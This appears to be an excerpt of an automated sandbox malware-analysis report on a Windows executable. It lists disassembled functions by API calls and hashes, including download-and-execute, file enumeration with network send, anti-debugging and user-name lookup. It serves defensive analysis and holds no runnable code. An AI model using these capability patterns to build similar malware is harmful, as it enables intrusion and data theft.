                                                                                                                                                                                              • Instruction Fuzzy Hash: EE5172329041089ACB14FBA5DD969ED7778AF50318F50017EB806B31D2EF3CAB498B99
APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
• URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: DownloadExecuteFileShell
• String ID: C:\Users\user\Desktop\4XYAW8PbZH.exe$open
• API String ID: 2825088817-1577825473
• Opcode ID: ff8c430fb8ca32cad0500a1d36d7f1307f3dbf8e19fa7769455aa58a39e32366
• Instruction ID: ed092bbb38966d98691ab8c1252c2e533cce500cde7a5ae80e96292b959be8c1
• Opcode Fuzzy Hash: ff8c430fb8ca32cad0500a1d36d7f1307f3dbf8e19fa7769455aa58a39e32366
• Instruction Fuzzy Hash: AC61A231604340A7CA14FA76C8569BE77A69F81718F00493FBC46772E6EF3C9A05C69B
APIs
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
• FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: FileFind$FirstNextsend
• String ID: x@G$x@G
• API String ID: 4113138495-3390264752
• Opcode ID: 0289bfe1971c588a6e1e7db017a286e895e6150be38c6e727895ab5dcaa3e2db
• Instruction ID: 69ed09b71aae528489a15fdfe73527b1f784865601dfee234b785914c9021214
• Opcode Fuzzy Hash: 0289bfe1971c588a6e1e7db017a286e895e6150be38c6e727895ab5dcaa3e2db
• Instruction Fuzzy Hash: 4D2147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
  • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
  • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
  • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CloseCreateInfoParametersSystemValue
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• API String ID: 4127273184-3576401099
• Opcode ID: 2bffa28fade511f5357cc31b36866154740c52a347c2bc5d983fcb8ea3edd996
• Instruction ID: f939710b15fdea32ddc266fac7b70a3034aa980cea7cdc9a443a85228e3c1b8e
• Opcode Fuzzy Hash: 2bffa28fade511f5357cc31b36866154740c52a347c2bc5d983fcb8ea3edd996
• Instruction Fuzzy Hash: 69113332B8060433D514343A4E6FBAE1806D756B60FA4015FF6026A7DAFB9E4AE103DF
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
  • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
  • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
  • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CloseCreateInfoParametersSystemValue
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• API String ID: 4127273184-3576401099
• Opcode ID: 7c51b3188c376ba38d52579200b820b5fb98d0af855b283685fe47f8f21eb3fa
• Instruction ID: 2aa0b6b87930d0e8bc36fe4f809622c3d335fadd5e5dd78f891cc162e383a86f
• Opcode Fuzzy Hash: 7c51b3188c376ba38d52579200b820b5fb98d0af855b283685fe47f8f21eb3fa
• Instruction Fuzzy Hash: E1F06232B8021422D529357A4E2FBEE1801D796B20F54002FF202A97E6FB8E4AD142DE
APIs
  • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
  • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
  • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
  • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
• IsValidCodePage.KERNEL32(00000000), ref: 00450B71
• _wcschr.LIBVCRUNTIME ref: 00450C01
• _wcschr.LIBVCRUNTIME ref: 00450C0F
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00450CB2
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
• String ID:
• API String ID: 4212172061-0
• Opcode ID: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
• Instruction ID: 5c43a781d12153ba09aec0d98fe41cbdfc67d130b552f984b55d9713d4fa54bc
• Opcode Fuzzy Hash: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
• Instruction Fuzzy Hash: 8C613C39600306AAD729AB35CC42AAB7398EF05316F14052FFD05D7283E778ED49C769
APIs
• __EH_prolog.LIBCMT ref: 00408DAC
• FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
• FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: FileFind$FirstH_prologNext
• String ID:
• API String ID: 301083792-0
• Opcode ID: de076679f85755db87780a347033046bf4357413a6f37d78cf41cd7617215d73
• Instruction ID: f05055f275ce1a6697326a6dce2c5e98ec7bccfbf1b509f624b4afbba7a31620
• Opcode Fuzzy Hash: de076679f85755db87780a347033046bf4357413a6f37d78cf41cd7617215d73
• Instruction Fuzzy Hash: 08714F728001199BCB15EBA1DC919EE7778AF54318F10427FE846B71E2EF386E45CB98
APIs
• _free.LIBCMT ref: 00448077
  • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
  • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
• GetTimeZoneInformation.KERNEL32 ref: 00448089
• WideCharToMultiByte.KERNEL32(00000000,?,0047179C,000000FF,?,0000003F,?,?), ref: 00448101
• WideCharToMultiByte.KERNEL32(00000000,?,004717F0,000000FF,?,0000003F,?,?,?,0047179C,000000FF,?,0000003F,?,?), ref: 0044812E
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
• String ID:
• API String ID: 806657224-0
• Opcode ID: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
• Instruction ID: 7f7bbd1fe339d2c51afc51fb5ca91abc0e6e8a710e1dc4bf18eddf40c0258009
• Opcode Fuzzy Hash: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
• Instruction Fuzzy Hash: B231BA70904205DFEB159F69CC8287EBBB8FF0576072541AFE054AB2B1DB348D46DB58
APIs
  • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
  • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
  • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
  • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
  • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
  • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450ECE
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F1F
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FDF
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2829624132-0
                                                                                                                                                                                              • Opcode ID: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                                                                                                                                              • Instruction ID: f4db154689a757c669ee29d9ad80dc5f2d25de97e2fa36f56d0a3b4566e2e889
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5261B3359002079BEB289F24CC82B7A77A8EF04706F1041BBED05C6696E77CD989DB58
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0043A765
                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0043A76F
                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0043A77C
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                              • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                                                                                              • Instruction ID: 91e5dab5071ea2c3d468f992cf6309450941867bc48944ec1b7f80ed58ec6f75
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A31D27494132CABCB21DF24D98979DBBB8AF08310F5051EAE80CA7261E7349F81CF49
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326D2,00000024,?,?,?), ref: 0043295C
                                                                                                                                                                                              • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBCE,?), ref: 00432972
                                                                                                                                                                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBCE,?), ref: 00432984
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1815803762-0
                                                                                                                                                                                              • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                                                                                              • Instruction ID: 265e42ecfadf18463eab4f7c57cd3d944434f2f899047e0b797dffc1cacfdca9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                                                                                              • Instruction Fuzzy Hash: 06E06531318311BBEB310E21BC08F577AE4AF89B72F650A3AF251E40E4D2A288019A1C
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,0044253A,?), ref: 00442585
                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,0044253A,?), ref: 0044258C
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0044259E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                              • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                                                                                              • Instruction ID: c44577b837509f0b32c3b0b508549cfe19acceb0599f6adc3fd698849a85d96e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 68E08C31004208BFEF016F10EE19A8D3F29EF14382F448475F8098A232CB79DD82CB88
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475FA
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                              • String ID: GetLocaleInfoEx
                                                                                                                                                                                              • API String ID: 2299586839-2904428671
                                                                                                                                                                                              • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                                                                              • Instruction ID: 2e67eb2aa2785e7236de0a8104ca96919387e7076f6eaa21777fcb5c897bf932
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                                                                              • Instruction Fuzzy Hash: F8F0F031A44308BBDB11AF61DC06F6E7B25EF04722F10016AFC042A292CF399E11969E
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1663032902-0
                                                                                                                                                                                              • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                                                                                              • Instruction ID: ffb89f5268d48ef7d96d62573a9e7ee2f0935f0833e1875b56c64ac51f5bdf94
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                                                                                              • Instruction Fuzzy Hash: BB21B332500606ABEB249E25DC42B7B73A8EF49316F1041BBFE01D6252EB7C9D49C759
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00450E7A,00000001), ref: 00450DC4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                              • String ID:
• API String ID: 1084509184-0
• Opcode ID: 7b25a473866e755be9e0678553a2658a3eea11fb5f40ef7cfa4196b50ecc0277
• Instruction ID: a560303710cbb7e2025c6fde9de160b8e713eede11b464f6c41b4ad7cf2026db
• Opcode Fuzzy Hash: 7b25a473866e755be9e0678553a2658a3eea11fb5f40ef7cfa4196b50ecc0277
• Instruction Fuzzy Hash: 0311063A2003055FDB189F79C8916BAB7A2FF8035AB14442DE94647741D375B846C744
APIs
  • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
  • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
  • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
  • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451098,00000000,00000000,?), ref: 00451326
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: ErrorLast$InfoLocale_abort_free
• String ID:
• API String ID: 2692324296-0
• Opcode ID: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
• Instruction ID: 4a7b2d8eee9e9bf1806ba2ca5426cfe5ee0bfa5d6ba01d855eb6d5500f899482
• Opcode Fuzzy Hash: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
• Instruction Fuzzy Hash: F8F07D32900211BBEF245B25CC16BFB7758EF40316F14046BEC05A3651EA78FD45C6D8
APIs
  • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
  • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
  • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
  • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
• EnumSystemLocalesW.KERNEL32(004510CA,00000001), ref: 00450E39
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID:
• API String ID: 1084509184-0
• Opcode ID: 7e65307bcba768225932e1b9f22076d55968ca759e379ed0ac358a887faacdb1
• Instruction ID: d200f6f198282f27697ffa375fc43d462b62b5ac62e6196a1a4f0d3fe89d4a8d
• Opcode Fuzzy Hash: 7e65307bcba768225932e1b9f22076d55968ca759e379ed0ac358a887faacdb1
• Instruction Fuzzy Hash: 6FF0223A2003055FDB145F3ADC92A7B7BD1EF81329B25883EFD458B681D2759C428604
APIs
• GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7E7
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
• Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
• Opcode Fuzzy Hash: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
• Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
APIs
  • Part of subcall function 00444ADC: EnterCriticalSection.KERNEL32(?,?,0044226B,00000000,0046DAC0,0000000C,00442226,?,?,?,00448749,?,?,00446F84,00000001,00000364), ref: 00444AEB
• EnumSystemLocalesW.KERNEL32(Function_00047078,00000001,0046DC48,0000000C), ref: 004470F6
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
• Opcode ID: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
• Instruction ID: 950dafe7846e52006e44ffeb80a247b0be4aa16561b4e62d8165e672452c2196
• Opcode Fuzzy Hash: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
• Instruction Fuzzy Hash: 86F04932A50200DFE714EF68EC06B5D37B0EB44729F10856AF414DB2A1CBB88941CB49
APIs
  • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
  • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
  • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
  • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
• EnumSystemLocalesW.KERNEL32(00450C5E,00000001), ref: 00450D3E
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID:
• API String ID: 1084509184-0
• Opcode ID: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
• Instruction ID: 864766c87332746f2956c71e591744750bfae77d4df159f99123e8476a767ca9
• Opcode Fuzzy Hash: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
• Instruction Fuzzy Hash: 94F05C3D30020557CB159F75D8057667F90EFC2711B164059FE098B242C675D846C754
APIs
• GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A30,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
• Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
• Opcode Fuzzy Hash: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
• Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
APIs
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: recv
• String ID:
• API String ID: 1507349165-0
• Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
• Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
• Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
• Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00033CF3,004339C1), ref: 00433CEC
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
• Instruction ID: 7ebf6c7408a73aa63663f0c3c7f2b2a2f8c8f4297a3c6ea18d4629481275dad6
• Opcode Fuzzy Hash: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
• Instruction Fuzzy Hash:
